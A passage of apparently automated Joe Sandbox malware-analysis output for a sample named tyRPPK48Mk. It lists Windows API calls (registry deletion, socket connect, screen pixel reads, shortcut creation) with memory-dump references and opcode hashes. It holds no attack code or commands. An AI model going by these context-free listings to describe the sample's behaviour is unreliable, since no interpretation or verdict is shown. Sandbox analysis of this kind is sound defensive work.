• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
• Sleep.KERNEL32(0000000A), ref: 0047D455
• InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
• InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: Interlocked$DecrementIncrement$Sleep
• String ID:
• API String ID: 327565842-0
APIs
• GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
• GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
• WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
• WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
• WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
Similarity
• API ID: PrivateProfile$SectionWrite$String
• String ID:
• API String ID: 2832842796-0
APIs
• RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
• RegCloseKey.ADVAPI32(?), ref: 00441CFE
• RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
• RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Enum$CloseDeleteOpen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2095303065-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: RectWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 861336768-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                                                                                                                                                                                                                                                                                                • TrackPopupMenuEx.USER32(?,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1300944170-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                                                                                                                                                                                                                                                                                                • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                                                                                                                                                                                                                                                                                                • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1822080540-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                                                                                                                                                                                                                                                                                                • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                                                                                                                                                                                                                                                                                                • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3087257052-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f69ffadf962ece00da2d3b786a5ca76815724ee7e4437aac7967cccaf73e78c3
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • IsWindow.USER32(00000000), ref: 00459F13
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetForegroundWindow.USER32 ref: 00459F2B
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetDC.USER32(00000000), ref: 00459F68
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetPixel.GDI32(00000000,?,00000003), ref: 00459F73
                                                                                                                                                                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 00459FAF
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Window$ForegroundPixelRelease
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4156661090-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00465225: inet_addr.WSOCK32(?), ref: 00465249
                                                                                                                                                                                                                                                                                                                                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,00000000), ref: 004653FE
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046540D
                                                                                                                                                                                                                                                                                                                                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00465446
                                                                                                                                                                                                                                                                                                                                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 0046546D
                                                                                                                                                                                                                                                                                                                                                                                                                                • closesocket.WSOCK32(00000000,00000000), ref: 00465481
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$closesocketconnectinet_addrsocket
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 245547762-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • DeleteObject.GDI32(00000000), ref: 004471D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExtCreatePen.GDI32(?,?,?,00000000,00000000), ref: 00447218
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447228
                                                                                                                                                                                                                                                                                                                                                                                                                                • BeginPath.GDI32(?), ref: 0044723D
                                                                                                                                                                                                                                                                                                                                                                                                                                • SelectObject.GDI32(?,00000000), ref: 00447266
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Object$Select$BeginCreateDeletePath
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2338827641-0
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00434598
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345B5
                                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 004345D4
                                                                                                                                                                                                                                                                                                                                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 004345DE
Memory Dump Source
• Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
Similarity
• API ID: CounterPerformanceQuerySleep
• String ID:
• API String ID: 2875609808-0
• Opcode ID: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction ID: a92d15520113c221d818f77e193bed66bb4dcccdbbd961c90b57f37ba003579f
• Opcode Fuzzy Hash: e7bcee6603ab5961272028a34fb999977f673cbbb9fa03059816f244ade9b228
• Instruction Fuzzy Hash: 37118232D0011DA7CF00EF99DD49AEEBB78FF99721F00456AEE4473240DA3465618BE9
APIs
• GetDlgItem.USER32(?,000003E9), ref: 00460C17
• GetWindowTextW.USER32(00000000,?,00000100), ref: 00460C2E
• MessageBeep.USER32(00000000), ref: 00460C46
• KillTimer.USER32(?,0000040A), ref: 00460C68
• EndDialog.USER32(?,00000001), ref: 00460C83
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
• Opcode ID: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction ID: 069ac2582a8c3c153a507cef710a9e07e91c6f457c78871e3a9641c65eda6ae6
• Opcode Fuzzy Hash: 1f18e2cfcdf944224a2d79a82bd846e8569cbd7b4094970ae8d1428a0e6a4617
• Instruction Fuzzy Hash: AB01DD315403086BE7349B54EE8DBDB737CFB14705F00465FB645921C0E7F4A9948B95
APIs
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
• Opcode ID: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction ID: 382768f54733291aaafbd4c53fc5fd67df7ff3e11fccf1fbf51b229105ba29ed
• Opcode Fuzzy Hash: d1b587dd721dc2c7258c81d6469637db7768a45f5ba7f0175e0776e0e6e6c26f
• Instruction Fuzzy Hash: B3F036751125109BD3519F28FD4875E3B68E747321F94423AEA15923F0CB785449CB6D
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 0041780F
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __getptd_noexit.LIBCMT ref: 00417A6C
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417A69: __amsg_exit.LIBCMT ref: 00417A79
                                                                                                                                                                                                                                                                                                                                                                                                                                • __getptd.LIBCMT ref: 00417826
                                                                                                                                                                                                                                                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00417834
                                                                                                                                                                                                                                                                                                                                                                                                                                • __lock.LIBCMT ref: 00417844
                                                                                                                                                                                                                                                                                                                                                                                                                                • __updatetlocinfoEx_nolock.LIBCMT ref: 00417858
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 938513278-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 276dd8d19a6a3be70f37c916a71154ef36d62806621923b96dbf7b6e4fe89171
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 82c9f3bbc84dc287df7640515fd49376d4ae64643407e313ceafc36016311655
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6DF09632A4C7009AD721BBA6940B7DD33B0AF10768F11415FF541572D2CB6C59C1CB9D
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 00413D20
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 00413D2B
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 00413D3E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 00413D47
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 00413D4E
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 00413D54
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00413D74
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1784898310.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1784996228.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785095811.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785137116.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785179201.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1785244153.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$Thread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2403457894-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 99982f4671f9afe760f134679f3a1374bf557b67af872bc9692f731b59fefeca
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 20cce849b0c51a5c00e20c35783146c720bf18a6b0a2527f17bda4bbe7e89b53
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1AE04F318443056B8F013BB39C1E8CF363C9E0434AB20082ABE1493112DA2C99C1C6BE
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004118F0: _doexit.LIBCMT ref: 004118FC
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 004151C0
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsGetValue.KERNEL32(?,00417A07,?,004115F6,?,00401BAC,?,?,?), ref: 004178B7
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004178AE: TlsSetValue.KERNEL32(00000000,?,004115F6,?,00401BAC,?,?,?), ref: 004178D8
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_getvalue@4.LIBCMT ref: 004151CB
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041788E: TlsGetValue.KERNEL32(?,?,00413D30,00000000), ref: 0041789C
                                                                                                                                                                                                                                                                                                                                                                                                                                • ___fls_setvalue@8.LIBCMT ref: 004151DD
                                                                                                                                                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000), ref: 004151E6
                                                                                                                                                                                                                                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 004151ED
                                                                                                                                                                                                                                                                                                                                                                                                                                • __freefls@4.LIBCMT ref: 00415209
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Value$ErrorExitLastThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 4247068974-0
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 3b3fb4cf1982b2ada2e5851f983e2cc6228237abb2dca353483d11accd99f00a
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3508d61e785490a8cfc18c63a66594c600054726567160c295e9e14b5a274e31
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5E0B631848705AECB013BB29D1E9DF3A799E54749B20082ABE1492122EE6C88D1C669
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 004426CD: _wcslen.LIBCMT ref: 004426F9
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoInitialize.OLE32(00000000), ref: 0046E505
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoCreateInstance.OLE32(00482A08,00000000,00000001,004828A8,?), ref: 0046E51E
                                                                                                                                                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0046E53D
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: .lnk
                                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 886957087-24824748
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 2644725dabb75134900838bfbf7f9974cf5b6b8c274c659ea1b0544ab4b4cf98
                                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 275befd32e5b5cb51e2fc879a9ecc6bbb724afd33f596a1e549e31a6ffdfd8c7
                                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A6A1CB756042019FC700EF65C980E5BB7E9AFC8308F108A5EF9859B392DB35EC45CBA6
                                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                                • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 0046A75B
                                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1784929081.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_tyRPPK48Mk.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: _memmovestd::exception::exception$Exception@8Throw_malloc_wcslen
                                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                                                                                                                                                                                                                                                                                                                                                                APIs
